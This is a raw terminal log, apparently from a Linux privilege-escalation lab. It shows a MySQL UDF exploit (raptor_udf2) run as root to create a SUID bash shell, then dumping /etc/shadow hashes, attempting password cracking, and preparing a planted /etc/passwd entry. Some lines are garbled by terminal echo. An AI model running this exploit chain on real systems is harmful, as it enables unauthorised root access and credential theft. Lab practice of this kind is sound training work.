168 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [P.], cksum 0xecc5 (correct), seq 11070:11086, ack 26747530, win 6347, options [nop,nop,TS val 3431984562 ecr 997087990], length 16: HTTP
16900:43:01.854816 IP (tos 0x0, ttl 64, id 24677, offset 0, flags [DF], proto TCP (6), length 70)
170 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [P.], cksum 0xf14c (correct), seq 11086:11104, ack 26747530, win 6347, options [nop,nop,TS val 3431984578 ecr 997087990], length 18: HTTP
17100:43:01.854940 IP (tos 0x0, ttl 64, id 24559, offset 0, flags [DF], proto TCP (6), length 52)
172 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [.], cksum 0xab0f (incorrect -> 0x855d), seq 26747530, ack 11104, win 482, options [nop,nop,TS val 997088038 ecr 3431984562], length 0
17300:43:01.860901 IP (tos 0x0, ttl 64, id 24560, offset 0, flags [DF], proto TCP (6), length 62695)
174 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [.], cksum 0x9fc3 (incorrect -> 0xfdf1), seq 26747530:26810173, ack 11104, win 482, options [nop,nop,TS val 997088044 ecr 3431984562], length 62643: HTTP
17500:43:01.861149 IP (tos 0x0, ttl 64, id 24567, offset 0, flags [DF], proto TCP (6), length 2896)
176 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [P.], cksum 0xb62b (incorrect -> 0xe4c3), seq 26810173:26813017, ack 11104, win 482, options [nop,nop,TS val 997088044 ecr 3431984562], length 2844: HTTP
17700:43:01.861301 IP (tos 0x0, ttl 64, id 24678, offset 0, flags [DF], proto TCP (6), length 52)
178 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [.], cksum 0x9dad (correct), seq 11104, ack 26801224, win 6071, options [nop,nop,TS val 3431984584 ecr 997088044], length 0
17900:43:01.861365 IP (tos 0x0, ttl 64, id 24679, offset 0, flags [DF], proto TCP (6), length 52)
180 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [.], cksum 0x6fe0 (correct), seq 11104, ack 26813017, win 6003, options [nop,nop,TS val 3431984584 ecr 997088044], length 0
18100:43:01.862496 IP (tos 0x0, ttl 64, id 24568, offset 0, flags [DF], proto TCP (6), length 57210)
182 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [P.], cksum 0x8a56 (incorrect -> 0x8614), seq 26813017:26870175, ack 11104, win 482, options [nop,nop,TS val 997088046 ecr 3431984584], length 57158: HTTP
183^Cssh user@10.10.170.166
189Owner@DESKTOP-8DUSIOO ~
190$ ssh user@10.10.170.166
191ssh: connect to host 10.10.170.166 port 22: Connection timed out
192
193Owner@DESKTOP-8DUSIOO ~
194$ ssh 10.10.170.166
195The authenticity of host '10.10.170.166 (10.10.170.166)' can't be esta
196blished.
197RSA key fingerprint is SHA256:JwwPVfqC+8LPQda0B9wFLZzXCXcoAho6s8wYGjkt
198Ank.
199Are you sure you want to continue connecting (yes/no)? yes
200Warning: Permanently added '10.10.170.166' (RSA) to the list of known
201Owner@DESKTOP-8DUSIOO ~
202$ ssh 10.10.170.166
203The authenticity of host '10.10.170.166 (10.10.170.166)' can't be established.
204RSA key fingerprint is SHA256:JwwPVfqC+8LPQda0B9wFLZzXCXcoAho6s8wYGjktAnk.
205Are you sure you want to continue connecting (yes/no)? yes
206Warning: Permanently added '10.10.170.166' (RSA) to the list of known hosts.
207owner@10.10.170.166's password:
208Permission denied, please try again.
209owner@10.10.170.166's password:
210Permission denied, please try again.
211owner@10.10.170.166's password:
212$ ssh 10.10.170.1666K0s
213Owner@DESKTOP-8DUSIOO ~ostname 10.10.170.166:22: No such host is known
214$ ssh 10.10.170.1666K0ssh: Could not resolve hostn
215ame 10.10.170.166:22: No such host is known.
216Owner@DESKTOP-8DUSIOO ~
217Owner@DESKTOP-8DUSIOO ~6 22
218$ 6 22
219ser@10user@10.10.170.166's passwor
220d:
221bash: 22: command not found
222Owner@DESKTOP-8DUSIOO ~
223Owner@DESKTOP-8DUSIOO ~6 22
224$ 6 220.10.170.1
22566's puser@10.10.170.166's password:
226owner@10.10.170.166's password:
227user@10.10.170.166's password:
228Owner@DESKTOP-8DUSIOO ~ound
229$ ssh 10.10.Ku
230Owner@DESKTOP- ~
231Owner@DESKTOP-8DUSIOO ~
232$ ssh user@10.10.170.166 22
233user@10.10.170.166's password:
234bash: 22: command not found
235bash: 22: command not found
236Owner@DESKTOP-8DUSIOO ~
237$ ssh user@10.10.170.166
238$ 6 22 [-E log_file] user@10.10.170.166's configfile] [-I pkcs11]
239password:
240Linux debian 2.6.32-5-amd64 #1 SMP Tue May 13 16:34:35 UTC 2014 x86_64
241
242The programs included with the Debian GNU/Linux system are free software;
243the exact distribution terms for each program are described in the
244individual files in /usr/share/doc/*/copyright.
245
246Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
247permitted by applicable law.
248Last login: Fri May 15 06:41:23 2020 from 192.168.1.125
249user@debian:~$ id
250uid=1000(user) gid=1000(user) groups=1000(user),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plug
251dev)
252user@debian:~$ ls
253myvpn.ovpn tools
254user@debian:~$ cd tools/
255user@debian:~/tools$ ls
256kernel-exploits mysql-udf nginx privesc-scripts sudo suid
257user@debian:~/tools$ cd mysql-udf/
258user@debian:~/tools/mysql-udf$ ls
259raptor_udf2.c
260user@debian:~/tools/mysql-udf$ gcc -g -c raptor_udf2.c -fPIC
261user@debian:~/tools/mysql-udf$ gcc -g -shared -W1, -soname, raptor_udf2.so -o raptor_udf2.so raptor_udf2
262.o -lc
263top - 20:04:48 up 11 min, 1 user, load average: 0.00, 0.07, 0.08
264Tasks: 83 total, 1 running, 82 sleeping, 0 stopped, 0 zombie
265Cpu(s): 0.0%us, 0.0%sy, 0.0%ni,100.0%id, 0.0%wa, 0.0%hi, 0.0%si, 0.0%st
266Mem: 507168k total, 498240k used, 8928k free, 382220k buffers
267Swap: 901112k total, 0k used, 901112k free, 54236k cached
268
269 PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND
270 1 root 20 0 8396 812 680 S 0.0 0.2 0:01.06 init
271 2 root 20 0 0 0 0 S 0.0 0.0 0:00.00 kthreadd
272 3 root RT 0 0 0 0 S 0.0 0.0 0:00.00 migration/0
273 4 root 20 0 0 0 0 S 0.0 0.0 0:00.00 ksoftirqd/0
274 5 root RT 0 0 0 0 S 0.0 0.0 0:00.00 watchdog/0
275 6 root 20 0 0 0 0 S 0.0 0.0 0:00.01 events/0
276 7 root 20 0 0 0 0 S 0.0 0.0 0:00.00 cpuset
277 8 root 20 0 0 0 0 S 0.0 0.0 0:00.00 khelper
278 9 root 20 0 0 0 0 S 0.0 0.0 0:00.00 netns
279 10 root 20 0 0 0 0 S 0.0 0.0 0:00.00 async/mgr
280 11 root 20 0 0 0 0 S 0.0 0.0 0:00.00 pm
281 12 root 20 0 0 0 0 S 0.0 0.0 0:00.00 xenwatch
282 13 root 20 0 0 0 0 S 0.0 0.0 0:00.00 xenbus
283 14 root 20 0 0 0 0 S 0.0 0.0 0:00.00 sync_supers
284 15 root 20 0 0 0 0 S 0.0 0.0 0:00.00 bdi-default
285 16 root 20 0 0 0 0 S 0.0 0.0 0:00.00 kintegrityd/0
286 17 root 20 0 0 0 0 S 0.0 0.0 0:00.00 kblockd/0
287 18 root 20 0 0 0 0 S 0.0 0.0 0:00.00 kacpid
288 19 root 20 0 0 0 0 S 0.0 0.0 0:00.00 kacpi_notify
289 20 root 20 0 0 0 0 S 0.0 0.0 0:00.00 kacpi_hotplug
290 21 root 20 0 0 0 0 S 0.0 0.0 0:00.06 kseriod
291 23 root 20 0 0 0 0 S 0.0 0.0 0:00.00 kondemand/0
292 24 root 20 0 0 0 0 S 0.0 0.0 0:00.00 khungtaskd
293 25 root 20 0 0 0 0 S 0.0 0.0 0:00.00 kswapd0
294 26 root 25 5 0 0 0 S 0.0 0.0 0:00.00 ksmd
295 27 root 20 0 0 0 0 S 0.0 0.0 0:00.00 aio/0
296 28 root 20 0 0 0 0 S 0.0 0.0 0:00.00 crypto/0
297 165 root 20 0 0 0 0 S 0.0 0.0 0:00.00 ata/0
298 166 root 20 0 0 0 0 S 0.0 0.0 0:00.00 ata_aux
299 167 root 20 0 0 0 0 S 0.0 0.0 0:00.00 scsi_eh_0
300 168 root 20 0 0 0 0 S 0.0 0.0 0:00.01 scsi_eh_1
301 198 root 20 0 0 0 0 S 0.0 0.0 0:00.00 kjournald
302 240 root 20 0 0 0 0 S 0.0 0.0 0:00.00 flush-202:0
303 275 root 16 -4 16784 796 380 S 0.0 0.2 0:00.34 udevd
304 425 root 20 0 0 0 0 S 0.0 0.0 0:00.00 kpsmoused
305 932 root 18 -2 16780 720 308 S 0.0 0.1 0:00.00 udevd
306 933 root 18 -2 16780 648 236 S 0.0 0.1 0:00.00 udevd
307 1249 root 20 0 6796 756 284 S 0.0 0.1 0:00.03 dhclient
308 1279 daemon 20 0 8136 532 408 S 0.0 0.1 0:00.00 portmap
309 1311 statd 20 0 14424 896 732 S 0.0 0.2 0:00.00 rpc.statd
310 1314 root 20 0 0 0 0 S 0.0 0.0 0:00.00 rpciod/0
311 1316 root 15 -5 0 0 0 S 0.0 0.0 0:00.00 kslowd000
312 1317 root 15 -5 0 0 0 S 0.0 0.0 0:00.00 kslowd001
313 1318 root 20 0 0 0 0 S 0.0 0.0 0:00.00 nfsiod
314 1325 root 20 0 27064 588 372 S 0.0 0.1 0:00.00 rpc.idmapd
315 1562 root 20 0 54336 1656 1084 S 0.0 0.3 0:00.08 rsyslogd
316 1638 root 20 0 3960 644 504 S 0.0 0.1 0:00.00 acpid
317 1672 root 20 0 71424 2896 1476 S 0.0 0.6 0:00.01 apache2
318 1675 www-data 20 0 71156 1992 596 S 0.0 0.4 0:00.00 apache2
319 1676 www-data 20 0 287m 2628 984 S 0.0 0.5 0:00.00 apache2
320 1677 www-data 20 0 287m 2644 996 S 0.0 0.5 0:00.00 apache2
321 1818 root 20 0 22468 1068 824 S 0.0 0.2 0:00.00 cron
322user@debian:~/tools/mysql-udf$ use mysql;
323-bash: use: command not found
324user@debian:~/tools/mysql-udf$ mysql -u root
325Welcome to the MySQL monitor. Commands end with ; or \g.
326Your MySQL connection id is 36
327Server version: 5.1.73-1+deb6u1 (Debian)
328
329Copyright (c) 2000, 2013, Oracle and/or its affiliates. All rights reserved.
330
331Oracle is a registered trademark of Oracle Corporation and/or its
332affiliates. Other names may be trademarks of their respective
333owners.
334
335Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
336
337mysql> use mysql;
338Reading table information for completion of table and column names
339You can turn off this feature to get a quicker startup with -A
340
341Database changed
342mysql> create table foo(line blob);
343Query OK, 0 rows affected (0.00 sec)
344
345mysql> insert into foo values(load_file('/home/user/tools/mysql-udf/raptor_udf2.so'));
346Query OK, 1 row affected (0.00 sec)
347
348mysql> select * from foo into dumpfile '/usr/lib/mysql/plugin/raptor_udf2.so';
349Query OK, 1 row affected (0.00 sec)
350
351mysql> create function do_system returns integer soname 'raptor_udf2.so';
352Query OK, 0 rows affected (0.00 sec)
353
354mysql> select do_system('cp /bin/bash /tmp/rootbash; chmod +xs /tmp/rootbash');
355+------------------------------------------------------------------+
356| do_system('cp /bin/bash /tmp/rootbash; chmod +xs /tmp/rootbash') |
357+------------------------------------------------------------------+
358| 0 |
359+------------------------------------------------------------------+
3601 row in set (0.00 sec)
361
362mysql> /q
363 -> exit
364 -> /quit
365 -> ^CCtrl-C -- exit!
366Aborted
367user@debian:~/tools/mysql-udf$ /tmp/rootbash -p
368rootbash-4.1# id
369uid=1000(user) gid=1000(user) euid=0(root) egid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30
370(dip),44(video),46(plugdev),1000(user)
371rootbash-4.1# cat /etc/shadow
372root:$6$Tb/euwmK$OXA.dwMeOAcopwBl68boTG5zi65wIHsc84OWAIye5VITLLtVlaXvRDJXET..it8r.jbrlpfZeMdwD3B0fGxJI0:
37317298:0:99999:7:::
374daemon:*:17298:0:99999:7:::
375bin:*:17298:0:99999:7:::
376sys:*:17298:0:99999:7:::
377sync:*:17298:0:99999:7:::
378games:*:17298:0:99999:7:::
379man:*:17298:0:99999:7:::
380lp:*:17298:0:99999:7:::
381mail:*:17298:0:99999:7:::
382news:*:17298:0:99999:7:::
383uucp:*:17298:0:99999:7:::
384proxy:*:17298:0:99999:7:::
385www-data:*:17298:0:99999:7:::
386backup:*:17298:0:99999:7:::
387list:*:17298:0:99999:7:::
388irc:*:17298:0:99999:7:::
389gnats:*:17298:0:99999:7:::
390nobody:*:17298:0:99999:7:::
391libuuid:!:17298:0:99999:7:::
392Debian-exim:!:17298:0:99999:7:::
393sshd:*:17298:0:99999:7:::
394user:$6$M1tQjkeb$M1A/ArH4JeyF1zBJPLQ.TZQR1locUlz0wIZsoY6aDOZRFrYirKDW5IJy32FBGjwYpT2O1zrR2xTROv7wRIkF8.:
39517298:0:99999:7:::
396statd:*:17299:0:99999:7:::
397mysql:!:18133:0:99999:7:::
398rootbash-4.1# cat /etc/passwd
399root:x:0:0:root:/root:/bin/bash
400daemon:x:1:1:daemon:/usr/sbin:/bin/sh
401bin:x:2:2:bin:/bin:/bin/sh
402sys:x:3:3:sys:/dev:/bin/sh
403sync:x:4:65534:sync:/bin:/bin/sync
404games:x:5:60:games:/usr/games:/bin/sh
405man:x:6:12:man:/var/cache/man:/bin/sh
406lp:x:7:7:lp:/var/spool/lpd:/bin/sh
407mail:x:8:8:mail:/var/mail:/bin/sh
408news:x:9:9:news:/var/spool/news:/bin/sh
409uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
410proxy:x:13:13:proxy:/bin:/bin/sh
411www-data:x:33:33:www-data:/var/www:/bin/sh
412backup:x:34:34:backup:/var/backups:/bin/sh
413list:x:38:38:Mailing List Manager:/var/list:/bin/sh
414irc:x:39:39:ircd:/var/run/ircd:/bin/sh
415gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
416nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
417libuuid:x:100:101::/var/lib/libuuid:/bin/sh
418Debian-exim:x:101:103::/var/spool/exim4:/bin/false
419sshd:x:102:65534::/var/run/sshd:/usr/sbin/nologin
420user:x:1000:1000:user,,,:/home/user:/bin/bash
421statd:x:103:65534::/var/lib/nfs:/bin/false
422mysql:x:104:106:MySQL Server,,,:/var/lib/mysql:/bin/false
423rootbash-4.1# cat /etc/hosts
424127.0.0.1 localhost
425127.0.1.1 debian.localdomain debian
426
427# The following lines are desirable for IPv6 capable hosts
428::1 ip6-localhost ip6-loopback
429fe00::0 ip6-localnet
430ff00::0 ip6-mcastprefix
431ff02::1 ip6-allnodes
432ff02::2 ip6-allrouters
433rootbash-4.1# ls -l /etc/shadow
434-rw-r--rw- 1 root shadow 837 Aug 25 2019 /etc/shadow
435rootbash-4.1# cat /etc/shadow
436root:$6$Tb/euwmK$OXA.dwMeOAcopwBl68boTG5zi65wIHsc84OWAIye5VITLLtVlaXvRDJXET..it8r.jbrlpfZeMdwD3B0fGxJI0:
43717298:0:99999:7:::
438daemon:*:17298:0:99999:7:::
439bin:*:17298:0:99999:7:::
440sys:*:17298:0:99999:7:::
441sync:*:17298:0:99999:7:::
442games:*:17298:0:99999:7:::
443man:*:17298:0:99999:7:::
444lp:*:17298:0:99999:7:::
445mail:*:17298:0:99999:7:::
446news:*:17298:0:99999:7:::
447uucp:*:17298:0:99999:7:::
448proxy:*:17298:0:99999:7:::
449www-data:*:17298:0:99999:7:::
450backup:*:17298:0:99999:7:::
451list:*:17298:0:99999:7:::
452irc:*:17298:0:99999:7:::
453gnats:*:17298:0:99999:7:::
454nobody:*:17298:0:99999:7:::
455libuuid:!:17298:0:99999:7:::
456Debian-exim:!:17298:0:99999:7:::
457sshd:*:17298:0:99999:7:::
458user:$6$M1tQjkeb$M1A/ArH4JeyF1zBJPLQ.TZQR1locUlz0wIZsoY6aDOZRFrYirKDW5IJy32FBGjwYpT2O1zrR2xTROv7wRIkF8.:
45917298:0:99999:7:::
460statd:*:17299:0:99999:7:::
461mysql:!:18133:0:99999:7:::
462rootbash-4.1# wget
463wget: missing URL
464Usage: wget [OPTION]... [URL]...
465
466Try ‘wget --help’ for more options.
467rootbash-4.1# pwd
468/home/user/tools/mysql-udf
469rootbash-4.1# ls
470raptor_udf2.c raptor_udf2.o raptor_udf2.so
471rootbash-4.1# cd ..
472rootbash-4.1# ls
473kernel-exploits mysql-udf nginx privesc-scripts sudo suid
474rootbash-4.1# cd ..
475rootbash-4.1# ls
476myvpn.ovpn tools
477rootbash-4.1# cd tools/
478rootbash-4.1# ls
479kernel-exploits mysql-udf nginx privesc-scripts sudo suid
480rootbash-4.1# cd privesc-scripts/
481rootbash-4.1# ls
482LinEnum.sh linpeas.sh lse.sh
483rootbash-4.1# john --wordlist =/usr/share/wordlists/rockyou.txt hash.txt
484login as: user
485user@10.10.170.166's password:
486Linux debian 2.6.32-5-amd64 #1 SMP Tue May 13 16:34:35 UTC 2014 x86_64
487
488The programs included with the Debian GNU/Linux system are free software;
489the exact distribution terms for each program are described in the
490individual files in /usr/share/doc/*/copyright.
491
492Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
493permitted by applicable law.
494Last login: Sun Jan 17 21:12:02 2021 from ip-10-9-252-16.eu-west-1.compute.internal
495user@debian:~$ cd /home/user/tools/mysql.udf
496-bash: cd: /home/user/tools/mysql.udf: No such file or directory
497user@debian:~$ ls
498myvpn.ovpn tools
499user@debian:~$ cd tools/
500user@debian:~/tools$ ls
501kernel-exploits mysql-udf nginx privesc-scripts sudo suid
502user@debian:~/tools$ gcc -g -c raptor_udf2.c -fPIC
503gcc: raptor_udf2.c: No such file or directory
504gcc: no input files
505user@debian:~/tools$ cd mysql-udf/
506user@debian:~/tools/mysql-udf$ gcc -g -c raptor_udf2.c -fPIC
507user@debian:~/tools/mysql-udf$ gcc -g -shared -W1, -soname, raptor_udf2.so -o re aptor_udf2.so raptor_udf2.o -1c
508gcc: unrecognized option '-soname,'
509gcc: unrecognized option '-1c'
510user@debian:~/tools/mysql-udf$ gcc -g -shared -W1, -soname, raptor_udf2.so -o re aptor_udf2.so raptor_udf2.o -lc
511gcc: unrecognized option '-soname,'
512user@debian:~/tools/mysql-udf$ gcc -g -shared -Wl,-soname,raptor_udf2.so -o rapt or_udf2.so raptor_udf2.o -lc
513user@debian:~/tools/mysql-udf$ mysql -u root
514Welcome to the MySQL monitor. Commands end with ; or \g.
515Your MySQL connection id is 37
516Server version: 5.1.73-1+deb6u1 (Debian)
517
518Copyright (c) 2000, 2013, Oracle and/or its affiliates. All rights reserved.
519
520Oracle is a registered trademark of Oracle Corporation and/or its
521affiliates. Other names may be trademarks of their respective
522owners.
523
524Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
525
526mysql> use mysql;
527Reading table information for completion of table and column names
528You can turn off this feature to get a quicker startup with -A
529
530Database changed
531mysql> create table bmillakid(line blob);
532Query OK, 0 rows affected (0.00 sec)
533
534mysql> insert into bmillakid values(load_file('home/usr/tools/mysql-udf/raptor_u df2.so' ));
535Query OK, 1 row affected (0.00 sec)
536
537mysql> select * from bmillakid into dumpfile '/usr/lib/mysql/plugin/raptor_udf2. so';
538ERROR 1086 (HY000): File '/usr/lib/mysql/plugin/raptor_udf2.so' already exists
539mysql> exit
540Bye
541user@debian:~/tools/mysql-udf$ who am i
542user pts/0 2021-01-17 21:14 (ip-10-9-252-16.eu-west-1.compute.internal)
543user@debian:~/tools/mysql-udf$ links
544-bash: links: command not found
545user@debian:~/tools/mysql-udf$ lynx
546-bash: lynx: command not found
547user@debian:~/tools/mysql-udf$ wget
548wget: missing URL
549Usage: wget [OPTION]... [URL]...
550
551Try ‘wget --help’ for more options.
552user@debian:~/tools/mysql-udf$ cat /etc/shadow
553root:$6$Tb/euwmK$OXA.dwMeOAcopwBl68boTG5zi65wIHsc84OWAIye5VITLLtVlaXvRDJXET..it8 r.jbrlpfZeMdwD3B0fGxJI0:17298:0:99999:7:::
554daemon:*:17298:0:99999:7:::
555bin:*:17298:0:99999:7:::
556sys:*:17298:0:99999:7:::
557sync:*:17298:0:99999:7:::
558games:*:17298:0:99999:7:::
559man:*:17298:0:99999:7:::
560lp:*:17298:0:99999:7:::
561mail:*:17298:0:99999:7:::
562news:*:17298:0:99999:7:::
563uucp:*:17298:0:99999:7:::
564proxy:*:17298:0:99999:7:::
565www-data:*:17298:0:99999:7:::
566backup:*:17298:0:99999:7:::
567list:*:17298:0:99999:7:::
568irc:*:17298:0:99999:7:::
569gnats:*:17298:0:99999:7:::
570nobody:*:17298:0:99999:7:::
571libuuid:!:17298:0:99999:7:::
572Debian-exim:!:17298:0:99999:7:::
573sshd:*:17298:0:99999:7:::
574user:$6$M1tQjkeb$M1A/ArH4JeyF1zBJPLQ.TZQR1locUlz0wIZsoY6aDOZRFrYirKDW5IJy32FBGjw YpT2O1zrR2xTROv7wRIkF8.:17298:0:99999:7:::
575statd:*:17299:0:99999:7:::
576mysql:!:18133:0:99999:7:::
577bmillakid:!:18645:0:99999:7:::
578user@debian:~/tools/mysql-udf$ cat /etc/passwd
579root:x:0:0:root:/root:/bin/bash
580daemon:x:1:1:daemon:/usr/sbin:/bin/sh
581bin:x:2:2:bin:/bin:/bin/sh
582sys:x:3:3:sys:/dev:/bin/sh
583sync:x:4:65534:sync:/bin:/bin/sync
584games:x:5:60:games:/usr/games:/bin/sh
585man:x:6:12:man:/var/cache/man:/bin/sh
586lp:x:7:7:lp:/var/spool/lpd:/bin/sh
587mail:x:8:8:mail:/var/mail:/bin/sh
588news:x:9:9:news:/var/spool/news:/bin/sh
589uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
590proxy:x:13:13:proxy:/bin:/bin/sh
591www-data:x:33:33:www-data:/var/www:/bin/sh
592backup:x:34:34:backup:/var/backups:/bin/sh
593list:x:38:38:Mailing List Manager:/var/list:/bin/sh
594irc:x:39:39:ircd:/var/run/ircd:/bin/sh
595gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
596nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
597libuuid:x:100:101::/var/lib/libuuid:/bin/sh
598Debian-exim:x:101:103::/var/spool/exim4:/bin/false
599sshd:x:102:65534::/var/run/sshd:/usr/sbin/nologin
600user:x:1000:1000:user,,,:/home/user:/bin/bash
601statd:x:103:65534::/var/lib/nfs:/bin/false
602mysql:x:104:106:MySQL Server,,,:/var/lib/mysql:/bin/false
603bmillakid:x:1001:1001::/home/bmillakid:/bin/sh
604user@debian:~/tools/mysql-udf$ ls -la user
605ls: cannot access user: No such file or directory
606user@debian:~/tools/mysql-udf$ pwd
607/home/user/tools/mysql-udf
608user@debian:~/tools/mysql-udf$ who am i
609user pts/0 2021-01-17 21:14 (ip-10-9-252-16.eu-west-1.compute.internal)
610user@debian:~/tools/mysql-udf$ whoami
611user
612user@debian:~/tools/mysql-udf$ ls -la /
613total 96
614drwxr-xr-x 22 root root 4096 Aug 25 2019 .
615drwxr-xr-x 22 root root 4096 Aug 25 2019 ..
616drwxr-xr-x 2 root root 4096 Aug 25 2019 bin
617drwxr-xr-x 3 root root 4096 May 12 2017 boot
618drwxr-xr-x 12 root root 2820 Jan 17 19:55 dev
619drwxr-xr-x 67 root root 4096 Jan 17 21:16 etc
620drwxr-xr-x 3 root root 4096 May 15 2017 home
621lrwxrwxrwx 1 root root 30 May 12 2017 initrd.img -> boot/initrd.img-2.6.32-5-amd64
622drwxr-xr-x 12 root root 12288 May 14 2017 lib
623lrwxrwxrwx 1 root root 4 May 12 2017 lib64 -> /lib
624drwx------ 2 root root 16384 May 12 2017 lost+found
625drwxr-xr-x 3 root root 4096 May 12 2017 media
626drwxr-xr-x 2 root root 4096 Jun 11 2014 mnt
627drwxr-xr-x 2 root root 4096 May 12 2017 opt
628dr-xr-xr-x 96 root root 0 Jan 17 19:53 proc
629drwx------ 5 root root 4096 May 15 2020 root
630drwxr-xr-x 2 root root 4096 May 13 2017 sbin
631drwxr-xr-x 2 root root 4096 Jul 21 2010 selinux
632drwxr-xr-x 2 root root 4096 May 12 2017 srv
633drwxr-xr-x 2 root root 4096 Aug 25 2019 .ssh
634drwxr-xr-x 13 root root 0 Jan 17 19:53 sys
635drwxrwxrwt 2 root root 4096 Jan 17 21:19 tmp
636drwxr-xr-x 11 root root 4096 May 13 2017 usr
637drwxr-xr-x 14 root root 4096 May 13 2017 var
638lrwxrwxrwx 1 root root 27 May 12 2017 vmlinuz -> boot/vmlinuz-2.6.32-5-amd64
639user@debian:~/tools/mysql-udf$ whoami
640user
641user@debian:~/tools/mysql-udf$ sudo -l
642Matching Defaults entries for user on this host:
643 env_reset, env_keep+=LD_PRELOAD, env_keep+=LD_LIBRARY_PATH
644
645User user may run the following commands on this host:
646 (root) NOPASSWD: /usr/sbin/iftop
647 (root) NOPASSWD: /usr/bin/find
648 (root) NOPASSWD: /usr/bin/nano
649 (root) NOPASSWD: /usr/bin/vim
650 (root) NOPASSWD: /usr/bin/man
651 (root) NOPASSWD: /usr/bin/awk
652 (root) NOPASSWD: /usr/bin/less
653 (root) NOPASSWD: /usr/bin/ftp
654 (root) NOPASSWD: /usr/bin/nmap
655 (root) NOPASSWD: /usr/sbin/apache2
656 (root) NOPASSWD: /bin/more
657user@debian:~/tools/mysql-udf$ cat /etc/shadow | grep root
658root:$6$Tb/euwmK$OXA.dwMeOAcopwBl68boTG5zi65wIHsc84OWAIye5VITLLtVlaXvRDJXET..it8 r.jbrlpfZeMdwD3B0fGxJI0:17298:0:99999:7:::
659user@debian:~/tools/mysql-udf$ ls -l /etc/passwd
660-rw-r--r-- 1 root root 1056 Jan 17 20:33 /etc/passwd
661user@debian:~/tools/mysql-udf$ openssl passwd l33th4x0rbr0!
662Warning: truncating password to 8 characters
6635v3Bvw7Nf6Zbs
664user@debian:~/tools/mysql-udf$
665user@debian:~/tools/mysql-udf$ 5v3Bvw7Nf6Zbs
666-bash: 5v3Bvw7Nf6Zbs: command not found
667user@debian:~/tools/mysql-udf$ nano /etc/passwd
668user@debian:~/tools/mysql-udf$ /tmp/rootbash -p
669rootbash-4.1# su newroot
670Unknown id: newroot
671rootbash-4.1# whoami
672root
673rootbash-4.1# cat /etc/passwd
674root:x:0:0:root:/root:/bin/bash
675daemon:x:1:1:daemon:/usr/sbin:/bin/sh
676bin:x:2:2:bin:/bin:/bin/sh
677sys:x:3:3:sys:/dev:/bin/sh
678sync:x:4:65534:sync:/bin:/bin/sync
679games:x:5:60:games:/usr/games:/bin/sh
680man:x:6:12:man:/var/cache/man:/bin/sh
681lp:x:7:7:lp:/var/spool/lpd:/bin/sh
682mail:x:8:8:mail:/var/mail:/bin/sh
683news:x:9:9:news:/var/spool/news:/bin/sh
684uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
685proxy:x:13:13:proxy:/bin:/bin/sh
686www-data:x:33:33:www-data:/var/www:/bin/sh
687backup:x:34:34:backup:/var/backups:/bin/sh
688list:x:38:38:Mailing List Manager:/var/list:/bin/sh
689irc:x:39:39:ircd:/var/run/ircd:/bin/sh
690gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
691nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
692libuuid:x:100:101::/var/lib/libuuid:/bin/sh
693Debian-exim:x:101:103::/var/spool/exim4:/bin/false
694sshd:x:102:65534::/var/run/sshd:/usr/sbin/nologin
695user:x:1000:1000:user,,,:/home/user:/bin/bash
696statd:x:103:65534::/var/lib/nfs:/bin/false
697mysql:x:104:106:MySQL Server,,,:/var/lib/mysql:/bin/false
698bmillakid:x:1001:1001::/home/bmillakid:/bin/sh
699rootbash-4.1# su root
700Password:
701su: Authentication failure
702rootbash-4.1# exit
703exit
704user@debian:~/tools/mysql-udf$ sudo -l
705Matching Defaults entries for user on this host:
706 env_reset, env_keep+=LD_PRELOAD, env_keep+=LD_LIBRARY_PATH
707
708User user may run the following commands on this host:
709 (root) NOPASSWD: /usr/sbin/iftop
710 (root) NOPASSWD: /usr/bin/find
711 (root) NOPASSWD: /usr/bin/nano
712 (root) NOPASSWD: /usr/bin/vim
713 (root) NOPASSWD: /usr/bin/man
714 (root) NOPASSWD: /usr/bin/awk
715 (root) NOPASSWD: /usr/bin/less
716 (root) NOPASSWD: /usr/bin/ftp
717 (root) NOPASSWD: /usr/bin/nmap
718 (root) NOPASSWD: /usr/sbin/apache2
719 (root) NOPASSWD: /bin/more
720user@debian:~/tools/mysql-udf$ cat /etc/crontab
721# /etc/crontab: system-wide crontab
722# Unlike any other crontab you don't have to run the `crontab'
723# command to install the new version when you edit this file
724# and files in /etc/cron.d. These files also have username fields,
725# that none of the other crontabs do.
726
727SHELL=/bin/sh
728PATH=/home/user:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
729
730# m h dom mon dow user command
73117 * * * * root cd / && run-parts --report /etc/cron.hourly
73225 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
73347 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
73452 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
735#
